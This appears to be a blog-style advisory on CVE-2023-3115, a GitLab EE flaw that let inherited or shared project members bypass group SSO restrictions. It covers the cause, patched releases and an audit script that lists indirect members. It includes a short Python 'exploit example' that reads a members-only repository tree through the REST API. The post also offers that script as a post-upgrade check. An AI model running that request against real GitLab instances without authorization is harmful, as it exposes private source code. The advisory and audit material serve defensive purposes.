CVE-2023-3115 is a security vulnerability in GitLab EE that affects multiple versions of the web-based Git repository manager. It allows Single Sign-On (SSO) restrictions to be bypassed by indirect project members, which can lead to unauthorized access to project repositories. This post covers the details of the vulnerability, the GitLab releases that fix it, and how to mitigate the associated risk.

Vulnerability Details

The root cause is that GitLab EE did not correctly enforce group Single Sign-On restrictions for indirect project members, that is, users whose project access comes from an ancestor group or a shared group rather than from being added to the project directly. The affected repositories belong to public projects whose repository is restricted to members only. An indirect member of such a project could read its repository without satisfying the group's SSO requirement, exposing source code and other repository contents to users who should have been blocked, with the usual consequences of a breach or intellectual property theft.

The restriction at issue is GitLab EE's group-level SSO enforcement, configured in a group's SAML SSO settings, which requires members to have an active SSO session with the group's identity provider before they can use the group's projects. Which identity provider backs that SAML configuration does not matter. Note that an indirect member is not simply a user who logged in through SSO: GitLab distinguishes direct members, who are added to a project explicitly, from indirect members, who inherit access from a parent group or receive it through a group share. The enforcement check was applied correctly to direct members but not to indirect ones, so a user holding only inherited or shared access to a public project with a members-only repository could read that repository without an SSO session.

Exploit Example

The following script shows the request an attacker would make. It is an ordinary call to the GitLab REST API; what makes it an exploit against a vulnerable instance is who owns the token.

import urllib.parse

import requests

gitlab_base_url = "https://git.example.com"
target_project_path = "target-group/target-project"

# A personal access token for a user who is only an indirect member of the
# target project (inherited from a parent group or granted via a group share)
# and who has no active SSO session with the group's identity provider
gitlab_api_token = "your-gitlab-api-token"

# A project path used in place of a numeric ID must be URL-encoded
encoded_path = urllib.parse.quote(target_project_path, safe="")
api_url = f"{gitlab_base_url}/api/v4/projects/{encoded_path}/repository/tree"

# Authenticate the request with the token
headers = {"Private-Token": gitlab_api_token}

# List the contents of the repository root
response = requests.get(api_url, headers=headers, timeout=30)

# A vulnerable instance returns the tree; a patched one rejects the request
print(response.status_code)
print(response.text)

This simple Python script uses the supplied API token to call the repository tree endpoint for the target project. Nothing in the request is unusual; on a vulnerable instance the request succeeds for an indirect member who has not signed in through the group's SSO provider, whereas a patched instance enforces the restriction and denies the request. The same script therefore doubles as a check that the upgrade took effect: run it with a token belonging to an indirect member who has no active SSO session and confirm the repository tree is no longer returned.

Mitigation

To mitigate the risk associated with this vulnerability, GitLab recommends upgrading to one of the patched releases below. Each release note describes the fix:

- GitLab 16.2.8 release notes
- GitLab 16.3.5 release notes
- GitLab 16.4.1 release notes

Additionally, system administrators should audit their GitLab instances: confirm the running version is at or above the patched release for its series, review which users hold indirect (inherited or shared) membership of projects whose groups enforce SSO, verify that the SSO restriction is now enforced for those users, and check for signs that such users accessed members-only repositories while the instance was unpatched.
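The two audit steps above, the version check and the enumeration of indirect members described in the vulnerability details, can be scripted against the GitLab REST API. The following is an added example written for this post, not GitLab's own tooling. It relies on two documented endpoints, GET /version and GET /projects/:id/members versus GET /projects/:id/members/all (the latter includes inherited and shared members), and on the patched releases listed in this section. The sample member responses embedded in it are constructed for illustration; the host, token and project path are placeholders.

```python
"""Audit helper for CVE-2023-3115 (added example, not GitLab's own code).

1. is_patched()       - compares an instance's reported version with the patched
                        releases named in the post (16.2.8, 16.3.5, 16.4.1).
2. indirect_members() - lists project members who hold access only through
                        inheritance or a group share, i.e. the population whose
                        SSO restrictions vulnerable versions failed to enforce.
"""
import json
import sys
import urllib.parse
import urllib.request

# Patched releases from the mitigation section, keyed by minor series.
PATCHED = {(16, 2): (16, 2, 8), (16, 3): (16, 3, 5), (16, 4): (16, 4, 1)}


def parse_version(raw):
    """'16.2.7-ee' -> (16, 2, 7); the edition suffix is ignored."""
    core = raw.split("-", 1)[0]
    parts = core.split(".")
    while len(parts) < 3:
        parts.append("0")
    return tuple(int(p) for p in parts[:3])


def is_patched(raw):
    """True when the version includes the fix, per the releases in PATCHED."""
    major, minor, patch = parse_version(raw)
    series = (major, minor)
    if series in PATCHED:
        return (major, minor, patch) >= PATCHED[series]
    if series > max(PATCHED):
        # A series newer than 16.4 was released after the fix.
        return True
    # Assumption: no patched release is listed for series older than 16.2,
    # so anything older is treated as needing an upgrade.
    return False


def indirect_members(direct, everyone):
    """Usernames present in /members/all but absent from /members.

    `direct` is the JSON from GET /projects/:id/members (direct members only);
    `everyone` is from GET /projects/:id/members/all (direct + inherited +
    shared). Both are lists of member objects with 'id' and 'username'.
    """
    direct_ids = {m["id"] for m in direct}
    return sorted(m["username"] for m in everyone if m["id"] not in direct_ids)


# Constructed sample responses, not captured from a real instance.
SAMPLE_DIRECT = [
    {"id": 11, "username": "alice", "access_level": 40},
]
SAMPLE_ALL = [
    {"id": 11, "username": "alice", "access_level": 40},
    {"id": 12, "username": "bob", "access_level": 30},    # inherited from parent group
    {"id": 13, "username": "carol", "access_level": 20},  # granted via a group share
]


def fetch_json(base_url, token, path):
    """GET an API path with a personal access token and decode the JSON body."""
    req = urllib.request.Request(
        f"{base_url}/api/v4{path}", headers={"PRIVATE-TOKEN": token}
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def audit(base_url, token, project_path):
    """Report the instance version, patch status and the project's indirect members.

    Assumes fewer than 100 members; a production audit should follow the
    X-Next-Page header to paginate both member listings.
    """
    version = fetch_json(base_url, token, "/version")["version"]
    enc = urllib.parse.quote(project_path, safe="")
    direct = fetch_json(base_url, token, f"/projects/{enc}/members?per_page=100")
    everyone = fetch_json(base_url, token, f"/projects/{enc}/members/all?per_page=100")
    return {
        "version": version,
        "patched": is_patched(version),
        "indirect_members": indirect_members(direct, everyone),
    }


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: audit.py https://git.example.com <token> group/project")
    print(json.dumps(audit(*sys.argv[1:]), indent=2))
```

Run it with an administrator token so both member listings are complete; the usernames it prints are the accounts whose SSO enforcement the vulnerable releases skipped, which is the list to cross-check against repository access logs for the unpatched period.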

Conclusion

CVE-2023-3115 allows indirect project members to bypass GitLab EE's group SSO restrictions and read members-only repositories of public projects, exposing source code to users who should have been blocked. GitLab has released patched versions that fix the problem. Affected organizations should upgrade to those releases, confirm that SSO enforcement now applies to inherited and shared members, and review whether any such users accessed restricted repositories while the instance was unpatched.

Timeline

Published on: 09/29/2023 07:15:00 UTC
Last modified on: 10/02/2023 19:46:00 UTC